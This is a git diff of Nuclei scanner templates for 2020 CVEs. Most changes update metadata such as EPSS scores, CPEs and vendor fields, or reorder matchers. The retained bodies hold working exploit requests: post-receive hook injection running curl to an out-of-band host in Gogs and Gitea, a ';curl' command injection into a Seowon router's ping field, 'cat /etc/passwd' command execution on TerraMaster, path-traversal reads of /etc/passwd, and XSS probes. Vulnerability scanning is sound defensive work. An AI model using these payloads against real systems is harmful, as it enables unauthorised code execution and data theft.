https://github.com/go-gitea/gitea/pull/13058 - https://www.fzi.de/en/news/news/detail-en/artikel/fsa-2020-3-schwachstelle-in-gitea-1125-und-gogs-0122-ermoeglicht-ausfuehrung-von-code-nach-authent/ - https://nvd.nist.gov/vuln/detail/CVE-2020-14144 + - https://docs.github.com/en/enterprise-server@2.19/admin/policies/creating-a-pre-receive-hook-script remediation: Fixed in version 1.16.7. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.2 cve-id: CVE-2020-14144 cwe-id: CWE-78 + epss-score: 0.96792 cpe: cpe:2.3:a:gitea:gitea:*:*:*:*:*:*:*:* - epss-score: 0.96681 metadata: max-request: 7 shodan-query: html:"Powered by Gitea Version" verified: true - tags: cve,cve2020,rce,gitea,authenticated,git + vendor: gitea + product: gitea + tags: cve,cve2020,rce,gitea,authenticated,git,intrusive http: - raw: - | GET /user/login HTTP/1.1 Host: {{Hostname}} - - | POST /user/login HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded _csrf={{csrf}}&user_name={{username}}&password={{url_encode(password)}} - - | GET /repo/create HTTP/1.1 Host: {{Hostname}} - - | POST /repo/create HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded _csrf={{auth_csrf}}&uid=1&repo_name={{randstr}}&private=on&description=&repo_template=&issue_labels=&gitignores=&license=&readme=Default&auto_init=on&default_branch=master - - | POST /{{username}}/{{randstr}}/settings/hooks/git/post-receive HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded _csrf={{auth_csrf}}&content=%23%21%2Fbin%2Fbash%0D%0Acurl+{{interactsh-url}} - - | GET /{{username}}/{{randstr}}/_new/master HTTP/1.1 Host: {{Hostname}} - - | POST /{{username}}/{{randstr}}/_new/master HTTP/1.1 Host: {{Hostname}} @@ -68,12 +65,13 @@ http: _csrf={{auth_csrf}}&last_commit={{last_commit}}&tree_path=test.txt&content=test&commit_summary=&commit_message=&commit_choice=direct cookie-reuse: true + matchers-condition: and matchers: - type: word part: interactsh_protocol words: - - "http" + - http - type: word part: body_1 @@ -85,19 +83,19 @@ http: name: csrf group: 1 regex: - - 'name="_csrf" value="(.*)"' + - name="_csrf" value="(.*)" internal: true - type: regex name: auth_csrf group: 1 regex: - - 'name="_csrf" content="(.*)"' + - name="_csrf" content="(.*)" internal: true - type: regex name: last_commit group: 1 regex: - - 'name="last_commit" value="(.*)"' + - name="last_commit" value="(.*)" internal: true diff --git a/http/cves/2020/CVE-2020-14179.yaml b/http/cves/2020/CVE-2020-14179.yaml index 7e1388c837..defae285c5 100644 --- a/http/cves/2020/CVE-2020-14179.yaml +++ b/http/cves/2020/CVE-2020-14179.yaml @@ -12,10 +12,13 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2020-14179 - epss-score: 0.00972 + epss-score: 0.0047 + cpe: cpe:2.3:a:atlassian:jira_data_center:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: http.component:"Atlassian Jira" + vendor: atlassian + product: jira_data_center tags: cve,cve2020,atlassian,jira,exposure,disclosure http: diff --git a/http/cves/2020/CVE-2020-14181.yaml b/http/cves/2020/CVE-2020-14181.yaml index 9add275247..84082ee55e 100644 --- a/http/cves/2020/CVE-2020-14181.yaml +++ b/http/cves/2020/CVE-2020-14181.yaml @@ -14,10 +14,13 @@ info: cvss-score: 5.3 cve-id: CVE-2020-14181 cwe-id: CWE-200 - epss-score: 0.97351 + epss-score: 0.971 + cpe: cpe:2.3:a:atlassian:data_center:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: http.component:"Atlassian Jira" + vendor: atlassian + product: data_center tags: cve,cve2020,atlassian,jira,packetstorm http: diff --git a/http/cves/2020/CVE-2020-14408.yaml b/http/cves/2020/CVE-2020-14408.yaml index 8e815ce984..0da876ebbf 100644 --- a/http/cves/2020/CVE-2020-14408.yaml +++ b/http/cves/2020/CVE-2020-14408.yaml @@ -13,11 +13,13 @@ info: cvss-score: 6.1 cve-id: CVE-2020-14408 cwe-id: CWE-79 - cpe: cpe:2.3:a:agentejo:cockpit:*:*:*:*:*:*:*:* epss-score: 0.00113 + cpe: cpe:2.3:a:agentejo:cockpit:0.10.2:*:*:*:*:*:*:* metadata: max-request: 1 verified: true + vendor: agentejo + product: cockpit tags: cve,cve2020,cockpit,agentejo,xss,oss http: @@ -27,7 +29,6 @@ http: matchers-condition: and matchers: - - type: word part: body words: diff --git a/http/cves/2020/CVE-2020-14413.yaml b/http/cves/2020/CVE-2020-14413.yaml index 71384942bf..fe2b26bf64 100644 --- a/http/cves/2020/CVE-2020-14413.yaml +++ b/http/cves/2020/CVE-2020-14413.yaml @@ -13,11 +13,13 @@ info: cvss-score: 6.1 cve-id: CVE-2020-14413 cwe-id: CWE-79 - cpe: cpe:2.3:a:nedi:nedi:*:*:*:*:*:*:*:* epss-score: 0.00095 - tags: cve,cve2020,nedi,xss + cpe: cpe:2.3:a:nedi:nedi:1.9c:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: nedi + product: nedi + tags: cve,cve2020,nedi,xss http: - method: GET @@ -26,17 +28,16 @@ http: matchers-condition: and matchers: - - type: word + part: body words: - "" - part: body - - - type: status - status: - - 200 - type: word part: header words: - "text/html" + + - type: status + status: + - 200 diff --git a/http/cves/2020/CVE-2020-14750.yaml b/http/cves/2020/CVE-2020-14750.yaml index f102633a55..4fe69b2713 100644 --- a/http/cves/2020/CVE-2020-14750.yaml +++ b/http/cves/2020/CVE-2020-14750.yaml @@ -11,17 +11,20 @@ info: - https://www.oracle.com/security-alerts/alert-cve-2020-14750.html - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14750 - https://nvd.nist.gov/vuln/detail/CVE-2020-14750 + - http://packetstormsecurity.com/files/160143/Oracle-WebLogic-Server-Administration-Console-Handle-Remote-Code-Execution.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-14750 - cpe: cpe:2.3:a:oracle:fusion_middleware:*:*:*:*:*:*:*:* - epss-score: 0.97539 + epss-score: 0.97528 + cpe: cpe:2.3:a:oracle:fusion_middleware:10.3.6.0:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: http.html:"Weblogic Application Server" verified: true - tags: cve,cve2020,rce,oracle,weblogic,unauth,kev + vendor: oracle + product: fusion_middleware + tags: packetstorm,cve,cve2020,rce,oracle,weblogic,unauth,kev http: - raw: @@ -53,7 +56,7 @@ http: matchers-condition: and matchers: - type: word - part: interactsh_protocol # Confirms DNS Interaction + part: interactsh_protocol # Confirms DNS Interaction words: - "dns" diff --git a/http/cves/2020/CVE-2020-14864.yaml b/http/cves/2020/CVE-2020-14864.yaml index 238ae70603..935d3ff093 100644 --- a/http/cves/2020/CVE-2020-14864.yaml +++ b/http/cves/2020/CVE-2020-14864.yaml @@ -13,24 +13,30 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2020-14864 - cpe: cpe:2.3:a:oracle:business_intelligence:*:*:*:*:*:*:*:* - epss-score: 0.35997 - tags: cve,cve2020,oracle,lfi,kev,packetstorm + cwe-id: CWE-22 + epss-score: 0.30306 + cpe: cpe:2.3:a:oracle:business_intelligence:5.5.0.0.0:*:*:*:enterprise:*:*:* metadata: max-request: 2 + vendor: oracle + product: business_intelligence + tags: cve,cve2020,oracle,lfi,kev,packetstorm http: - method: GET path: - - '{{BaseURL}}/analytics/saw.dll?bieehome&startPage=1' # grab autologin cookies + - '{{BaseURL}}/analytics/saw.dll?bieehome&startPage=1' - '{{BaseURL}}/analytics/saw.dll?getPreviewImage&previewFilePath=/etc/passwd' + cookie-reuse: true + matchers-condition: and matchers: + - type: regex + part: body + regex: + - 'root:.*:0:0:' + - type: status status: - 200 - - type: regex - regex: - - 'root:.*:0:0:' - part: body diff --git a/http/cves/2020/CVE-2020-14882.yaml b/http/cves/2020/CVE-2020-14882.yaml index 5bbf261482..984102de19 100644 --- a/http/cves/2020/CVE-2020-14882.yaml +++ b/http/cves/2020/CVE-2020-14882.yaml @@ -16,11 +16,13 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-14882 - cpe: cpe:2.3:a:oracle:weblogic_server:*:*:*:*:*:*:*:* - epss-score: 0.97553 - tags: cve,cve2020,oracle,rce,weblogic,oast,kev + epss-score: 0.97544 + cpe: cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: oracle + product: weblogic_server + tags: cve,cve2020,oracle,rce,weblogic,oast,kev http: - method: GET diff --git a/http/cves/2020/CVE-2020-14883.yaml b/http/cves/2020/CVE-2020-14883.yaml index 3be72b8794..5b7c8156b8 100644 --- a/http/cves/2020/CVE-2020-14883.yaml +++ b/http/cves/2020/CVE-2020-14883.yaml @@ -15,14 +15,15 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.2 cve-id: CVE-2020-14883 - cpe: cpe:2.3:a:oracle:weblogic_server:*:*:*:*:*:*:*:* - epss-score: 0.97532 + epss-score: 0.97528 + cpe: cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:* metadata: max-request: 1 verified: true shodan-query: title:"Oracle PeopleSoft Sign-in" + vendor: oracle + product: weblogic_server tags: oracle,rce,weblogic,kev,packetstorm,cve,cve2020 - variables: str: "{{randstr}}" revstr: "{{reverse(str)}}" diff --git a/http/cves/2020/CVE-2020-15050.yaml b/http/cves/2020/CVE-2020-15050.yaml index e95022156b..b43b8e7c11 100644 --- a/http/cves/2020/CVE-2020-15050.yaml +++ b/http/cves/2020/CVE-2020-15050.yaml @@ -14,11 +14,13 @@ info: cvss-score: 7.5 cve-id: CVE-2020-15050 cwe-id: CWE-22 + epss-score: 0.14193 cpe: cpe:2.3:a:supremainc:biostar_2:*:*:*:*:*:*:*:* - epss-score: 0.26151 - tags: suprema,biostar2,packetstorm,cve,cve2020,lfi metadata: max-request: 1 + vendor: supremainc + product: biostar_2 + tags: suprema,biostar2,packetstorm,cve,cve2020,lfi http: - method: GET diff --git a/http/cves/2020/CVE-2020-15129.yaml b/http/cves/2020/CVE-2020-15129.yaml index ed41bf8faf..4a2318f583 100644 --- a/http/cves/2020/CVE-2020-15129.yaml +++ b/http/cves/2020/CVE-2020-15129.yaml @@ -16,11 +16,13 @@ info: cvss-score: 4.7 cve-id: CVE-2020-15129 cwe-id: CWE-601 - cpe: cpe:2.3:a:traefik:traefik:*:*:*:*:*:*:*:* epss-score: 0.00519 - tags: cve,cve2020,traefik,redirect + cpe: cpe:2.3:a:traefik:traefik:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: traefik + product: traefik + tags: cve,cve2020,traefik,redirect http: - method: GET @@ -32,11 +34,11 @@ http: matchers-condition: and matchers: - - type: status - status: - - 302 - - type: word part: body words: - "Found" + + - type: status + status: + - 302 diff --git a/http/cves/2020/CVE-2020-15148.yaml b/http/cves/2020/CVE-2020-15148.yaml index 24a2031412..662423edcb 100644 --- a/http/cves/2020/CVE-2020-15148.yaml +++ b/http/cves/2020/CVE-2020-15148.yaml @@ -16,11 +16,13 @@ info: cvss-score: 10 cve-id: CVE-2020-15148 cwe-id: CWE-502 + epss-score: 0.01814 cpe: cpe:2.3:a:yiiframework:yii:*:*:*:*:*:*:*:* - epss-score: 0.01843 - tags: cve,cve2020,rce,yii metadata: max-request: 1 + vendor: yiiframework + product: yii + tags: cve,cve2020,rce,yii http: - method: GET diff --git a/http/cves/2020/CVE-2020-15227.yaml b/http/cves/2020/CVE-2020-15227.yaml index be0b9cf1d2..a07bef6112 100644 --- a/http/cves/2020/CVE-2020-15227.yaml +++ b/http/cves/2020/CVE-2020-15227.yaml @@ -7,18 +7,22 @@ info: description: Nette Framework versions before 2.0.19, 2.1.13, 2.2.10, 2.3.14, 2.4.16, and 3.0.6 are vulnerable to a code injection attack via specially formed parameters being passed to a URL. Nette is a PHP/Composer MVC Framework. reference: - https://github.com/nette/application/security/advisories/GHSA-8gv3-3j7f-wg94 - - https://www.pwnwiki.org/index.php?title=CVE-2020-15227_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E# - https://github.com/Mr-xn/Penetration_Testing_POC/blob/02546075f378a9effeb6426fc17beb66b6d5c8ee/books/Nette%E6%A1%86%E6%9E%B6%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C(CVE-2020-15227).md - https://nvd.nist.gov/vuln/detail/CVE-2020-15227 + - https://lists.debian.org/debian-lts-announce/2021/04/msg00003.html + - https://packagist.org/packages/nette/application classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-15227 - cwe-id: CWE-74 - epss-score: 0.97403 - tags: cve,cve2020,nette,rce + cwe-id: CWE-94,CWE-74 + epss-score: 0.9741 + cpe: cpe:2.3:a:nette:application:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: nette + product: application + tags: cve,cve2020,nette,rce http: - method: GET @@ -27,7 +31,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2020/CVE-2020-15500.yaml b/http/cves/2020/CVE-2020-15500.yaml index 798646ffdb..c719b21439 100644 --- a/http/cves/2020/CVE-2020-15500.yaml +++ b/http/cves/2020/CVE-2020-15500.yaml @@ -14,11 +14,13 @@ info: cvss-score: 6.1 cve-id: CVE-2020-15500 cwe-id: CWE-79 - cpe: cpe:2.3:a:tileserver:tileservergl:*:*:*:*:*:*:*:* epss-score: 0.0021 - tags: cve,cve2020,xss,tileserver,packetstorm + cpe: cpe:2.3:a:tileserver:tileservergl:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: tileserver + product: tileservergl + tags: cve,cve2020,xss,tileserver,packetstorm http: - method: GET @@ -27,16 +29,16 @@ http: matchers-condition: and matchers: - - type: status - status: - - 200 - - type: word part: header words: - "text/html" - type: word + part: body words: - "'>\"" - part: body + + - type: status + status: + - 200 diff --git a/http/cves/2020/CVE-2020-15505.yaml b/http/cves/2020/CVE-2020-15505.yaml index 7cb9853b89..2865bc404e 100644 --- a/http/cves/2020/CVE-2020-15505.yaml +++ b/http/cves/2020/CVE-2020-15505.yaml @@ -4,7 +4,6 @@ id: CVE-2020-15505 # To carry out further attacks, please see reference[2] below. # This template works by passing a Hessian header, otherwise; # it will return a 403 or 500 internal server error. Reference[3]. - info: name: MobileIron Core & Connector <= v10.6 & Sentry <= v9.8 - Remote Code Execution author: dwisiswant0 @@ -20,10 +19,14 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-15505 - epss-score: 0.97524 - tags: cve,cve2020,mobileiron,rce,sentry,kev + cwe-id: CWE-706 + epss-score: 0.97504 + cpe: cpe:2.3:a:mobileiron:core:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: mobileiron + product: core + tags: cve,cve2020,mobileiron,rce,sentry,kev http: - raw: @@ -35,12 +38,14 @@ http: Connection: close {{hex_decode('630200480004')}} + matchers-condition: and matchers: - type: word + part: header words: - "application/x-hessian" - part: header + - type: status status: - 200 diff --git a/http/cves/2020/CVE-2020-15568.yaml b/http/cves/2020/CVE-2020-15568.yaml index 42c8535887..80ca9dfcd9 100644 --- a/http/cves/2020/CVE-2020-15568.yaml +++ b/http/cves/2020/CVE-2020-15568.yaml @@ -14,11 +14,13 @@ info: cvss-score: 9.8 cve-id: CVE-2020-15568 cwe-id: CWE-913 + epss-score: 0.96537 cpe: cpe:2.3:o:terra-master:tos:*:*:*:*:*:*:*:* - epss-score: 0.96812 - tags: cve,cve2020,terramaster,rce metadata: max-request: 2 + vendor: terra-master + product: tos + tags: cve,cve2020,terramaster,rce http: - raw: @@ -26,7 +28,6 @@ http: GET /include/exportUser.php?type=3&cla=application&func=_exec&opt=(cat%20/etc/passwd)%3Enuclei.txt HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - - | GET /include/nuclei.txt HTTP/1.1 Host: {{Hostname}} @@ -35,9 +36,10 @@ http: matchers-condition: and matchers: - type: regex + part: body regex: - "root:.*:0:0:" - part: body + - type: status status: - 200 diff --git a/http/cves/2020/CVE-2020-15867.yaml b/http/cves/2020/CVE-2020-15867.yaml index 9ac52e2f26..1c0e2c2499 100644 --- a/http/cves/2020/CVE-2020-15867.yaml +++ b/http/cves/2020/CVE-2020-15867.yaml @@ -15,48 +15,44 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.2 cve-id: CVE-2020-15867 + epss-score: 0.96555 cpe: cpe:2.3:a:gogs:gogs:*:*:*:*:*:*:*:* - epss-score: 0.9663 metadata: max-request: 7 verified: true - tags: cve,cve2020,rce,gogs,git,authenticated,packetstorm + vendor: gogs + product: gogs + tags: cve,cve2020,rce,gogs,git,authenticated,packetstorm,intrusive http: - raw: - | GET /user/login HTTP/1.1 Host: {{Hostname}} - - | POST /user/login HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded _csrf={{csrf}}&user_name={{username}}&password={{url_encode(password)}} - - | GET /repo/create HTTP/1.1 Host: {{Hostname}} - - | POST /repo/create HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded _csrf={{auth_csrf}}&user_id=1&repo_name={{randstr}}&private=on&description=&gitignores=&license=&readme=Default&auto_init=on - - | POST /{{username}}/{{randstr}}/settings/hooks/git/post-receive HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded _csrf={{auth_csrf}}&content=%23%21%2Fbin%2Fbash%0D%0Acurl+{{interactsh-url}} - - | GET /{{username}}/{{randstr}}/_new/master HTTP/1.1 Host: {{Hostname}} - - | POST /{{username}}/{{randstr}}/_new/master HTTP/1.1 Host: {{Hostname}} @@ -65,36 +61,37 @@ http: _csrf={{auth_csrf}}&last_commit={{last_commit}}&tree_path=test.txt&content=test&commit_summary=&commit_message=&commit_choice=direct cookie-reuse: true + matchers-condition: and matchers: - type: word part: interactsh_protocol words: - - "http" + - http - type: word part: body_1 words: - - 'content="Gogs' + - content="Gogs extractors: - type: regex name: csrf group: 1 regex: - - 'name="_csrf" value="(.*)"' + - name="_csrf" value="(.*)" internal: true - type: regex name: auth_csrf group: 1 regex: - - 'name="_csrf" content="(.*)"' + - name="_csrf" content="(.*)" internal: true - type: regex name: last_commit group: 1 regex: - - 'name="last_commit" value="(.*)"' + - name="last_commit" value="(.*)" internal: true diff --git a/http/cves/2020/CVE-2020-15895.yaml b/http/cves/2020/CVE-2020-15895.yaml index 79ff8fe424..c412810275 100644 --- a/http/cves/2020/CVE-2020-15895.yaml +++ b/http/cves/2020/CVE-2020-15895.yaml @@ -16,9 +16,12 @@ info: cve-id: CVE-2020-15895 cwe-id: CWE-79 epss-score: 0.00187 + cpe: cpe:2.3:o:d-link:dir-816l_firmware:2.06:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: html:"DIR-816L" + vendor: d-link + product: dir-816l_firmware tags: cve,cve2020,dlink,xss http: diff --git a/http/cves/2020/CVE-2020-15920.yaml b/http/cves/2020/CVE-2020-15920.yaml index c20b72b9b5..59abbb89ec 100644 --- a/http/cves/2020/CVE-2020-15920.yaml +++ b/http/cves/2020/CVE-2020-15920.yaml @@ -15,11 +15,13 @@ info: cvss-score: 9.8 cve-id: CVE-2020-15920 cwe-id: CWE-78 + epss-score: 0.97241 cpe: cpe:2.3:a:midasolutions:eframework:*:*:*:*:*:*:*:* - epss-score: 0.97362 - tags: cve,cve2020,mida,rce,packetstorm metadata: max-request: 1 + vendor: midasolutions + product: eframework + tags: cve,cve2020,mida,rce,packetstorm http: - method: POST diff --git a/http/cves/2020/CVE-2020-16139.yaml b/http/cves/2020/CVE-2020-16139.yaml index 9390d4c200..8f3c8cfc12 100644 --- a/http/cves/2020/CVE-2020-16139.yaml +++ b/http/cves/2020/CVE-2020-16139.yaml @@ -7,19 +7,20 @@ info: description: | Cisco Unified IP Conference Station 7937G 1-4-4-0 through 1-4-5-7 allows attackers to restart the device remotely via specially crafted packets that can cause a denial-of-service condition. Note: We cannot prove this vulnerability exists. Out of an abundance of caution, this CVE is being assigned to better serve our customers and ensure all who are still running this product understand that the product is end of life and should be removed or upgraded. reference: - - https://blacklanternsecurity.com/2020-08-07-Cisco-Unified-IP-Conference-Station-7937G/ - http://packetstormsecurity.com/files/158819/Cisco-7937G-Denial-Of-Service.html - - https://www.blacklanternsecurity.com/2020-08-07-Cisco-Unified-IP-Conference-Station-7937G/ - https://www.cisco.com/c/en/us/products/collateral/collaboration-endpoints/unified-ip-phone-7940g/end_of_life_notice_c51-729487.html - https://nvd.nist.gov/vuln/detail/CVE-2020-16139 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H cvss-score: 7.5 cve-id: CVE-2020-16139 - epss-score: 0.00835 - tags: cve,cve2020,dos,cisco,packetstorm + epss-score: 0.01181 + cpe: cpe:2.3:o:cisco:unified_ip_conference_station_7937g_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: cisco + product: unified_ip_conference_station_7937g_firmware + tags: cve,cve2020,dos,cisco,packetstorm http: - raw: @@ -29,13 +30,15 @@ http: matchers-condition: and matchers: - - type: status - status: - - 200 - type: word part: header words: - "application/xml" + - type: word words: - 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + + - type: status + status: + - 200 diff --git a/http/cves/2020/CVE-2020-16846.yaml b/http/cves/2020/CVE-2020-16846.yaml index f70bba6c42..a3bc1a2c27 100644 --- a/http/cves/2020/CVE-2020-16846.yaml +++ b/http/cves/2020/CVE-2020-16846.yaml @@ -11,35 +11,41 @@ info: - https://mp.weixin.qq.com/s/R8qw_lWizGyeJS0jOcYXag - https://github.com/vulhub/vulhub/tree/master/saltstack/CVE-2020-16846 - https://nvd.nist.gov/vuln/detail/CVE-2020-16846 + - http://lists.opensuse.org/opensuse-security-announce/2020-11/msg00029.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-16846 cwe-id: CWE-78 - epss-score: 0.97535 - tags: vulhub,cve,cve2020,saltstack,kev + epss-score: 0.97541 + cpe: cpe:2.3:a:saltstack:salt:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: saltstack + product: salt + tags: vulhub,cve,cve2020,saltstack,kev http: - method: POST path: - "{{BaseURL}}/run" + body: "token=1337&client=ssh&tgt=*&fun=a&roster=projectdiscovery&ssh_priv=nuclei" + headers: Content-Type: application/x-www-form-urlencoded # CherryPy will abort w/o define this header matchers-condition: and matchers: + - type: dsl + dsl: + - regex("CherryPy\/([0-9.]+)", header) || regex("CherryPy ([0-9.]+)", body) + - type: word part: body words: - "An unexpected error occurred" - - type: dsl - dsl: - - regex("CherryPy\/([0-9.]+)", header) || regex("CherryPy ([0-9.]+)", body) - - type: word part: header words: diff --git a/http/cves/2020/CVE-2020-16952.yaml b/http/cves/2020/CVE-2020-16952.yaml index c23fe6a4de..3d0e4fc201 100644 --- a/http/cves/2020/CVE-2020-16952.yaml +++ b/http/cves/2020/CVE-2020-16952.yaml @@ -15,10 +15,13 @@ info: cvss-score: 7.8 cve-id: CVE-2020-16952 cwe-id: CWE-346 - epss-score: 0.23324 - tags: msf,cve,cve2020,sharepoint,iis,microsoft,ssi,rce + epss-score: 0.16299 + cpe: cpe:2.3:a:microsoft:sharepoint_enterprise_server:2016:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: microsoft + product: sharepoint_enterprise_server + tags: msf,cve,cve2020,sharepoint,iis,microsoft,ssi,rce http: - method: GET diff --git a/http/cves/2020/CVE-2020-17362.yaml b/http/cves/2020/CVE-2020-17362.yaml index efd39d7980..563e80c21c 100644 --- a/http/cves/2020/CVE-2020-17362.yaml +++ b/http/cves/2020/CVE-2020-17362.yaml @@ -14,11 +14,14 @@ info: cvss-score: 6.1 cve-id: CVE-2020-17362 cwe-id: CWE-79 - cpe: cpe:2.3:a:themeinprogress:nova_lite:*:*:*:*:*:*:*:* - epss-score: 0.00095 - tags: wordpress,xss,wp-plugin,wpscan,cve,cve2020,unauth + epss-score: 0.00101 + cpe: cpe:2.3:a:themeinprogress:nova_lite:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + framework: wordpress + vendor: themeinprogress + product: nova_lite + tags: wordpress,xss,wp-plugin,wpscan,cve,cve2020,unauth http: - method: GET @@ -28,14 +31,14 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word + part: body words: - "nova-lite" - part: body - type: word part: header diff --git a/http/cves/2020/CVE-2020-17453.yaml b/http/cves/2020/CVE-2020-17453.yaml index 4657bb0f25..94bd06ecc1 100644 --- a/http/cves/2020/CVE-2020-17453.yaml +++ b/http/cves/2020/CVE-2020-17453.yaml @@ -14,10 +14,13 @@ info: cvss-score: 6.1 cve-id: CVE-2020-17453 cwe-id: CWE-79 - epss-score: 0.02402 - tags: xss,wso2,cve2020,cve + epss-score: 0.01736 + cpe: cpe:2.3:a:wso2:api_manager:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: wso2 + product: api_manager + tags: xss,wso2,cve2020,cve http: - method: GET @@ -26,16 +29,16 @@ http: matchers-condition: and matchers: + - type: word + part: body + words: + - "'';alert('nuclei')//';" + + - type: word + part: header + words: + - "text/html" + - type: status status: - 200 - - - type: word - words: - - "'';alert('nuclei')//';" - part: body - - - type: word - words: - - "text/html" - part: header diff --git a/http/cves/2020/CVE-2020-17456.yaml b/http/cves/2020/CVE-2020-17456.yaml index f1a453e524..7d0f42657b 100644 --- a/http/cves/2020/CVE-2020-17456.yaml +++ b/http/cves/2020/CVE-2020-17456.yaml @@ -9,16 +9,20 @@ info: - https://maj0rmil4d.github.io/Seowon-SlC-130-And-SLR-120S-Exploit/ - https://nvd.nist.gov/vuln/detail/CVE-2020-17456 - http://packetstormsecurity.com/files/158933/Seowon-SlC-130-Router-Remote-Code-Execution.html + - http://packetstormsecurity.com/files/166273/Seowon-SLR-120-Router-Remote-Code-Execution.html + - https://www.exploit-db.com/exploits/50821 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-17456 cwe-id: CWE-78 - epss-score: 0.97283 - tags: seowon,cve2020,oast,packetstorm,rce,router,unauth,iot,cve + epss-score: 0.97265 + cpe: cpe:2.3:o:seowonintech:slc-130_firmware:-:*:*:*:*:*:*:* metadata: max-request: 2 - + vendor: seowonintech + product: slc-130_firmware + tags: seowon,cve2020,oast,packetstorm,rce,router,unauth,iot,cve variables: useragent: '{{rand_base(6)}}' @@ -40,6 +44,7 @@ http: Command=Diagnostic&traceMode=ping&reportIpOnly=&pingIpAddr=;curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'&pingPktSize=56&pingTimeout=30&pingCount=4&maxTTLCnt=30&queriesCnt=3&reportIpOnlyCheckbox=on&logarea=com.cgi&btnApply=Apply&T=1646950471018 cookie-reuse: true + matchers-condition: and matchers: - type: word diff --git a/http/cves/2020/CVE-2020-17496.yaml b/http/cves/2020/CVE-2020-17496.yaml index ef71ee803d..85f29f017d 100644 --- a/http/cves/2020/CVE-2020-17496.yaml +++ b/http/cves/2020/CVE-2020-17496.yaml @@ -10,16 +10,19 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2020-17496 - https://seclists.org/fulldisclosure/2020/Aug/5 - https://forum.vbulletin.com/forum/vbulletin-announcements/vbulletin-announcements_aa/4445227-vbulletin-5-6-0-5-6-1-5-6-2-security-patch + - https://cwe.mitre.org/data/definitions/78.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-17496 cwe-id: CWE-74 + epss-score: 0.97513 cpe: cpe:2.3:a:vbulletin:vbulletin:*:*:*:*:*:*:*:* - epss-score: 0.97519 - tags: vbulletin,rce,kev,tenable,seclists,cve,cve2020 metadata: max-request: 1 + vendor: vbulletin + product: vbulletin + tags: vbulletin,rce,kev,tenable,seclists,cve,cve2020 http: - raw: diff --git a/http/cves/2020/CVE-2020-17505.yaml b/http/cves/2020/CVE-2020-17505.yaml index 4d3d0de91a..0fc619a4d1 100644 --- a/http/cves/2020/CVE-2020-17505.yaml +++ b/http/cves/2020/CVE-2020-17505.yaml @@ -14,11 +14,13 @@ info: cvss-score: 8.8 cve-id: CVE-2020-17505 cwe-id: CWE-78 - cpe: cpe:2.3:a:articatech:web_proxy:*:*:*:*:*:*:*:* - epss-score: 0.97122 - tags: proxy,packetstorm,cve,cve2020,rce,artica + epss-score: 0.96863 + cpe: cpe:2.3:a:articatech:web_proxy:4.30.000000:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: articatech + product: web_proxy + tags: proxy,packetstorm,cve,cve2020,rce,artica http: - raw: @@ -26,23 +28,23 @@ http: GET 